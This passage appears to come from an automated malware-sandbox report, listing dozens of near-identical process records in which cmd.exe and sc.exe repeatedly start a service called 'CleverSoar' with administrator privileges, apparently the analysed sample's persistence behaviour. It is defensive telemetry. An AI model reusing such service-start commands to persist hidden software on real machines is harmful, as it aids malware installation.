                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:02:49:02
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:02:49:03
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:78
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:81
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:82
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:83
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:84
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:85
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:86
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:87
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff70f330000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:88
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:89
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:90
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:91
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:92
                                      Start time:02:49:04
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:93
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:94
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:95
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:96
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:97
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:98
                                      Start time:02:49:05
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
